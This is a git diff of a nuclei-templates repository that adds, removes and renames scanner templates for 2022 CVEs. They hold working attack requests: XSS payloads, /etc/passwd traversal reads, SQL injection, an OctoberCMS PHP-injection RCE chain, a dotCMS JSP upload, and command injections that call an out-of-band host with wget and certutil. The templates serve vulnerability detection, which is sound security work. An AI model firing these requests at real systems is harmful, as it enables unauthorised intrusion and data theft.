'{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - " popup-" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1392.yaml b/nuclei-templates/CVE-2022/CVE-2022-1392.yaml new file mode 100644 index 0000000000..1cfaf712bd --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1392.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-1392 +info: + name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion + author: Veshraj + severity: high + description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. + reference: + - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 + - https://packetstormsecurity.com/files/166534/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1392 + metadata: + verified: true + tags: cve,cve2022,lfi,wp-plugin,wp,wordpress,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "failed to open stream: No such file or directory" + - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1439.yaml b/nuclei-templates/CVE-2022/CVE-2022-1439.yaml new file mode 100644 index 0000000000..1ea71e54a9 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1439.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-1439 +info: + name: Microweber Reflected Cross-Site Scripting + author: pikpikcu + severity: medium + description: Reflected XSS in microweber/microweber prior to 1.2.15. Execute Arbitrary JavaScript as the attacked user. It's the only payload I found working, you might need to press "tab" but there is probably a paylaod that runs without user interaction. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-1439 + - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/ + - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0 + - https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1439 + cwe-id: CWE-79 + metadata: + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2022,microweber,xss +requests: + - method: GET + path: + - '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "
' + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-21705.yaml b/nuclei-templates/CVE-2022/CVE-2022-21705.yaml new file mode 100644 index 0000000000..d48170c9cf --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-21705.yaml @@ -0,0 +1,94 @@ +id: CVE-2022-21705 +info: + name: OctoberCMS Authenticated Remote Code Execution + author: iPhantasmic + severity: high + description: | + Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area. + remediation: | + The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually. + reference: + - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe + - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 + - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-21705 + cwe-id: CWE-74 + tags: cve,cve2022,authenticated,rce,cms,octobercms,injection +requests: + - raw: + - | # to obtain session_key and token + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + - | # to perform authentication and obtain admin cookies + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} + - | # to inject php code in Markup editor and perform exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onSave + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 + - | # to obtain theme + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onCreateTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&type=page + - | # to access the template page for generated exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onOpenTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm + cookie-reuse: true + extractors: + - type: xpath + name: session_key + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" + internal: true + # Obtain _session_key for current OctoberCMS session + - type: xpath + name: token + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" + internal: true + # Obtain _token for current OctoberCMS session + - type: regex + name: theme + part: body + group: 1 + regex: + - '

301 Moved Permanently

' - - - type: regex - part: location - regex: - - 'https?:\/\/(.*):' - - extractors: - - type: regex - part: location - group: 1 - regex: - - 'https?:\/\/(.*):' - -# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml b/nuclei-templates/CVE-2022/CVE-2022-23881.yaml new file mode 100644 index 0000000000..84b802eba2 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-23881.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-23881 + +info: + name: zzzphp v2.1.0 RCE + author: pikpikcu + severity: critical + description: ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution (RCE) vulnerability via danger_key() at zzz_template.php. + reference: + - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md + - http://www.zzzcms.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 + tags: cve,cve2022,rce,zzzphp,zzzcms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-23881 + cwe-id: CWE-77 + +requests: + - raw: + - | + GET /?location=search HTTP/1.1 + Host: {{Hostname}} + Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 500 diff --git a/nuclei-templates/CVE-2022/cve-2022-23944.yaml b/nuclei-templates/CVE-2022/CVE-2022-23944.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-23944.yaml rename to nuclei-templates/CVE-2022/CVE-2022-23944.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-24124.yaml b/nuclei-templates/CVE-2022/CVE-2022-24124.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-24124.yaml rename to nuclei-templates/CVE-2022/CVE-2022-24124.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-24681.yaml b/nuclei-templates/CVE-2022/CVE-2022-24681.yaml deleted file mode 100644 index ae88561611..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24681.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2022-24681 -info: - name: ManageEngine ADSelfService - Stored XSS - author: Open-Sec - severity: medium - description: | - Zoho ManageEngine ADSelfService Plus before 6121 allows XSS via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screen. - reference: - - https://raxis.com/blog/cve-2022-24681 - - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 - - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html - - https://manageengine.com - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24681 - cwe-id: CWE-79 - tags: cve,cve2022,manageengine,xss,authenticated -requests: - - raw: - - | - POST /servlet/GetProductVersion HTTP/1.1 - Host: {{Hostname}} - extractors: - - type: regex - part: body - name: buildnumber - group: 1 - regex: - - '"BUILD_NUMBER":"([0-9]+)",' - internal: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(buildnumber, '< 6121') - - type: word - part: body - words: - - "ManageEngine" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24856.yaml b/nuclei-templates/CVE-2022/CVE-2022-24856.yaml new file mode 100644 index 0000000000..0bf893b39e --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-24856.yaml @@ -0,0 +1,30 @@ +id: CVE-2022-24856 +info: + name: Flyte Console <0.52.0 - Server-Side Request Forgery + author: pdteam + severity: high + description: | + FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. + reference: + - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9 + - https://github.com/flyteorg/flyteconsole/pull/389 + - https://hackerone.com/reports/1540906 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24856 + remediation: | + The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-24856 + cwe-id: CWE-918 + tags: cve,cve2022,flyteconsole,ssrf,oss +requests: + - method: GET + path: + - "{{BaseURL}}/cors_proxy/https://www.interact.sh" + matchers: + - type: word + words: + - "Interactsh Server" + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2486.yaml b/nuclei-templates/CVE-2022/CVE-2022-2486.yaml deleted file mode 100644 index 2c3533d673..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-2486.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2022-2486 -info: - name: Wavlink Mesh.cgi - Remote Code Execution - author: For3stCo1d - severity: critical - description: | - A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used. - reference: - - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486 - - https://vuldb.com/?id.204537 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-2486 - cwe-id: CWE-78 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,iot,wavlink,router,rce,oast -requests: - - raw: - - | - GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - type: status - status: - - 500 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2487.yaml b/nuclei-templates/CVE-2022/CVE-2022-2487.yaml deleted file mode 100644 index 899076eb8b..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-2487.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2022-2487 -info: - name: Wavlink Nightled.cgi - Remote Code Execution - author: For3stCo1d - severity: critical - description: | - A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used. - reference: - - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487 - - https://vuldb.com/?id.204538 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-2487 - cwe-id: CWE-78 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,iot,wavlink,router,rce,oast -variables: - cmd: "id" -requests: - - raw: - - | - @timeout: 10s - POST /cgi-bin/nightled.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - page=night_led&start_hour=;{{cmd}}; - matchers-condition: and - matchers: - - type: word - part: body - words: - - "uid=" - - "gid=" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2488.yaml b/nuclei-templates/CVE-2022/CVE-2022-2488.yaml new file mode 100644 index 0000000000..5c0bb7ac8b --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-2488.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-2488 +info: + name: Wavlink Touchlist_sync.cgi - Remote Code Execution + author: For3stCo1d + severity: critical + description: | + A vulnerability was found in WAVLINK WN535K2 and WN535K3 and classified as critical. This issue affects some unknown processing of the file /cgi-bin/touchlist_sync.cgi. The manipulation of the argument IP leads to os command injection. The exploit has been disclosed to the public and may be used. + reference: + - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488 + - https://vuldb.com/?id.204539 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-2488 + cwe-id: CWE-78 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: cve,cve2022,iot,wavlink,router,rce,oast +requests: + - raw: + - | + GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + - type: status + status: + - 500 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26159.yaml b/nuclei-templates/CVE-2022/CVE-2022-26159.yaml new file mode 100644 index 0000000000..5ad8567611 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-26159.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-26159 + +info: + name: Ametys CMS Information Disclosure + author: Remi Gascou (podalirius) + severity: medium + description: "Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords." + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 + - https://podalirius.net/en/cves/2022-26159/ + tags: cve,cve2022,plugin,ametys,cms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2022-26159 + +requests: + - method: GET + path: + - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' + + matchers-condition: and + matchers: + - type: word + words: + - '' + - '' + condition: and + + - type: word + part: header + words: + - 'text/xml' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2022/cve-2022-26233.yaml b/nuclei-templates/CVE-2022/CVE-2022-26233.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-26233.yaml rename to nuclei-templates/CVE-2022/CVE-2022-26233.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-26352.yaml b/nuclei-templates/CVE-2022/CVE-2022-26352.yaml deleted file mode 100644 index f75c2c3155..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26352.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2022-26352 -info: - name: DotCMS - Arbitrary File Upload - author: h1ei1 - severity: critical - description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. - reference: - - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ - - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352 - - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html - classification: - cve-id: CVE-2022-26352 - tags: cve,cve2022,rce,dotcms -requests: - - raw: - - | - POST /api/content/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3 - - --------------------------aadc326f7ae3eac3 - Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp" - Content-Type: text/plain - - <% - out.println("CVE-2022-26352"); - %> - --------------------------aadc326f7ae3eac3-- - - | - GET /{{randstr}}.jsp HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, "CVE-2022-26352")' - - 'status_code_2 == 200' - condition: and - -# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26564.yaml b/nuclei-templates/CVE-2022/CVE-2022-26564.yaml deleted file mode 100644 index f95d08a217..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26564.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2022-26564 -info: - name: HotelDruid Hotel Management Software 3.0.3 XSS - author: alexrydzak - severity: medium - description: | - HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability. - reference: - - https://rydzak.me/2022/04/cve-2022-26564/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-26564 - - https://www.hoteldruid.com - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-26564 - cwe-id: CWE-79 - metadata: - shodan-query: http.favicon.hash:-1521640213 - tags: cve,cve2022,hoteldruid,xss -requests: - - method: GET - path: - - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22>' - - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22>&idclienti=1' - - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22>' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "HotelDruid" - condition: and - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26960.yaml b/nuclei-templates/CVE-2022/CVE-2022-26960.yaml new file mode 100644 index 0000000000..21b4f71879 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-26960.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-26960 +info: + name: elFinder <=2.1.60 - Local File Inclusion + author: pikpikcu + severity: critical + description: | + elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + reference: + - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html + - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db + - https://www.synacktiv.com/publications.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2022-26960 + cwe-id: CWE-22 + metadata: + verified: true + tags: cve,cve2022,lfi,elfinder +requests: + - raw: + - | + GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/05 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28079.yaml b/nuclei-templates/CVE-2022/CVE-2022-28079.yaml deleted file mode 100644 index 8124852465..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-28079.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-28079 -info: - name: College Management System - SQL Injection - author: ritikchaddha - severity: high - description: | - College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter. - reference: - - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated - - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f - - https://nvd.nist.gov/vuln/detail/CVE-2022-28079 - - https://code-projects.org/college-management-system-in-php-with-source-code/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-28079 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,cms,collegemanagement -variables: - num: "999999999" -requests: - - raw: - - | - POST /admin/asign-single-student-subjects.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL# - matchers-condition: and - matchers: - - type: word - words: - - '{{md5({{num}})}}' - - type: status - status: - - 302 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28080.yaml b/nuclei-templates/CVE-2022/CVE-2022-28080.yaml new file mode 100644 index 0000000000..dc59377c75 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-28080.yaml @@ -0,0 +1,65 @@ +id: CVE-2022-28080 +info: + name: Royal Event - SQL Injection + author: lucasljm2001,ekrause,ritikchaddha + severity: high + description: | + Detects an SQL Injection vulnerability in Royal Event System + reference: + - https://www.exploit-db.com/exploits/50934 + - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28080 + tags: cve,cve2022,sqli,authenticated,cms,royalevent +requests: + - raw: + - | + POST /royal_event/ HTTP/1.1 + Host: {{Hostname}} + Content-Length: 353 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD + + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="username" + + {{username}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="password" + + {{password}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="login" + + + ------WebKitFormBoundaryCSxQll1eihcqgIgD-- + - | + POST /royal_event/btndates_report.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD + + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="todate" + + 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="search" + + 3 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="fromdate" + + 01/01/2011 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - '{{md5("{{randstr}}")}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29298.yaml b/nuclei-templates/CVE-2022/CVE-2022-29298.yaml new file mode 100644 index 0000000000..191cb6e9b8 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-29298.yaml @@ -0,0 +1,33 @@ +id: CVE-2022-29298 +info: + name: SolarView Compact 6.00 - Directory Traversal + author: ritikchaddha + severity: high + description: SolarView Compact ver.6.00 allows attackers to access sensitive files via directory traversal. + reference: + - https://www.exploit-db.com/exploits/50950 + - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view + - https://nvd.nist.gov/vuln/detail/CVE-2022-29298 + - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-29298 + cwe-id: CWE-22 + metadata: + shodan-query: http.html:"SolarView Compact" + verified: "true" + tags: cve,cve2022,lfi,solarview +requests: + - method: GET + path: + - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-29303.yaml b/nuclei-templates/CVE-2022/CVE-2022-29303.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-29303.yaml rename to nuclei-templates/CVE-2022/CVE-2022-29303.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-29548.yaml b/nuclei-templates/CVE-2022/CVE-2022-29548.yaml new file mode 100644 index 0000000000..f6b5e980e8 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-29548.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-29548 +info: + name: WSO2 Management Console - Reflected XSS + author: edoardottt + severity: medium + description: | + A reflected XSS issue exists in the Management Console of several WSO2 products. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-29548 + cwe-id: CWE-79 + metadata: + google-dork: inurl:"carbon/admin/login" + verified: "true" + tags: cve,cve2022,wso2,xss +requests: + - method: GET + path: + - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CARBON.showWarningDialog('???');alert(document.domain)//???" + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30489.yaml b/nuclei-templates/CVE-2022/CVE-2022-30489.yaml new file mode 100644 index 0000000000..fa2302aea9 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-30489.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-30489 +info: + name: Wavlink Wn535g3 - POST XSS + author: For3stCo1d + severity: medium + description: | + WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi. + reference: + - https://github.com/badboycxcc/XSS-CVE-2022-30489 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 + - https://github.com/badboycxcc/XSS + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 